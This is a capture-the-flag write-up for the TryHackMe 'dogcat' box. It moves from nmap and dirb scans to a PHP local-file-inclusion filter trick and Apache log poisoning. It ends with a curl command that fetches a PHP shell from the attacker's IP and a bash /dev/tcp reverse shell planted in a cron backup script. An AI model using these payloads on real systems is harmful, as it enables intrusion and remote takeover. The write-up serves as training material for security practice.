# flag1
# start with nmap.

```
┌─[mayomacam@parrot]─[~/tryhackme/challange/dogcat]
└──╼ $nmap --min-rate 1000 -p- 10.10.192.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 23:53 IST
Warning: 10.10.192.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.192.58
Host is up (0.18s latency).
Not shown: 65437 closed ports, 96 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 137.86 seconds

=================================================================================
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.870 days (since Mon Aug 24 05:08:46 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

##### not much we get with nmap. try with nikto. nothing found.

##### this is php based and there are no service. some php files are calling may be lfi because php.
```
<b>Warning</b>:  include(dogs.php): failed to open stream: No such file or directory in <b>/var/www/html/index.php</b> on line <b>24</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'dogs.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/index.php</b> on line <b>24</b><br />
    </div>
</body>
```
##### when i accidentaly change name dog to dogs then i got this error. ?view= value checking for dog and cat value. only cat and dog i am getting warning on others i getting error.

##### normal lfi not working but i am still getting warnings.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#path-and-dot-truncation

##### many didn't work. in between i am running dirb and i got folder cats and dogs. when i go to folders i got error forbidden.
```
┌─[mayomacam@parrot]─[~]
└──╼ $dirb http://10.10.192.58

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 30 01:02:45 2020
URL_BASE: http://10.10.192.58/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.192.58/ ----
==> DIRECTORY: http://10.10.192.58/cats/                                                                                              
+ http://10.10.192.58/dogs/                                                                                              
+ http://10.10.192.58/index.php (CODE:200|SIZE:418)                                                                                   
+ http://10.10.192.58/server-status (CODE:403|SIZE:277)  


```

##### we got a vary parameter in response header.
```
Vary: Accept-Encoding
```

##### this mean only encoded data can anyone see. now i have to find that encode.

##### this time when i use value like
```
php://filter/read=convert.base64-encode/resource=./dogs/../index.php
```

##### in warning i got it's automatic adding a .php in last when i am try to getting index.php file.
```
include(php://filter/read=convert.base64-encode/resource=./dogs/../index.php.php): failed to open stream: operation failed in <b>/var/www/html/index.php</b> on line <b>24</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'php://filter/read=convert.base64-encode/resource=./dogs/../index.php.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/index.php</b> on line

```

##### when now when i remove .php from index.php and only want index file then we got base64 data. this time it work.
```
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>
```

##### after decoding we got that it's adding .php in value of view. there is some variables like ext. it's checking if dog and cat then add extension.

##### i run wfuzz to see what file we have here.
```
┌─[mayomacam@parrot]─[~]
└──╼ $wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,403 -u "http://10.10.192.58/?view=php://filter/read=convert.base64-encode/resource=./dogs/../FUZZ" --hl 23 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.192.58/?view=php://filter/read=convert.base64-encode/resource=./dogs/../FUZZ
Total requests: 220560

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                               
===================================================================

000000015:   200        19 L     40 W     1710 Ch     "index"                                                               
000000589:   200        19 L     40 W     498 Ch      "cat"                                                                 
000001663:   200        19 L     40 W     506 Ch      "flag"                                                                
000006793:   200        19 L     40 W     498 Ch      "dog"                                                                 

Total time: 544.8960
Processed Requests: 220560
Filtered Requests: 220556
Requests/sec.: 404.7744
```
##### and i got flag.php then i got that file using lfi too. and got 1 flag.

# flag2

###### and in index.php $ext is also checking . as let's end our payload with ext.
##### %00 is not working and we still getting waring. let's try &.

##### remember the “ext” check? we can remove the “.php” extension just by defining it in the query

##### we got some data. all previous data make log bigger so i have to restart box.
```
http://10.10.139.236/?view=./dogs/../../../../../../../var/log/apache2/access.log&ext
```

##### we got
```
127.0.0.1 - - [29/Aug/2020:22:17:45 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
127.0.0.1 - - [29/Aug/2020:22:18:21 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.8.19.129 - - [29/Aug/2020:22:19:03 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.68.0"
127.0.0.1 - - [29/Aug/2020:22:19:06 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.8.19.129 - - [29/Aug/2020:22:19:29 +0000] "GET / HTTP/1.1" 200 537 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
10.8.19.129 - - [29/Aug/2020:22:19:32 +0000] "GET /style.css HTTP/1.1" 200 698 "http://10.10.139.236/" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
10.8.19.129 - - [29/Aug/2020:22:19:32 +0000] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
127.0.0.1 - - [29/Aug/2020:22:19:46 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0"
10.8.19.129 - - [29/Aug/2020:22:19:59 +0000] "GET /?view=dog HTTP/1.1" 200 564 "http://10.10.139.236/" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
10.8.19.129 - - [29/Aug/2020:22:20:00 +0000] "GET /dogs/5.jpg HTTP/1.1" 200 29484 "http://10.10.139.236/?view=dog" "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"
```

##### let's see we can run commands then. because what we have done is log poison.
```
https://owasp.org/www-community/attacks/Log_Injection
```

##### 
```
https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1
```

##### let's go for remote file exclusion.

##### using file upload .



```
/?view=./dogs/../../../../../../../var/log/apache2/access.log&ext&cmd=curl+10.8.19.129/mayomacam.php+>+mayomacam.php
```

##### got shell as www-data.


===============================================================================================================================================================


##### for flag4 we have get machine shell we are in container.

```
echo "#!/bin/bash" > /opt/backups/backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.8.19.129/8888 0>&1'" >> /opt/backups/backup.sh
```

wait for 1 min we got root shell.
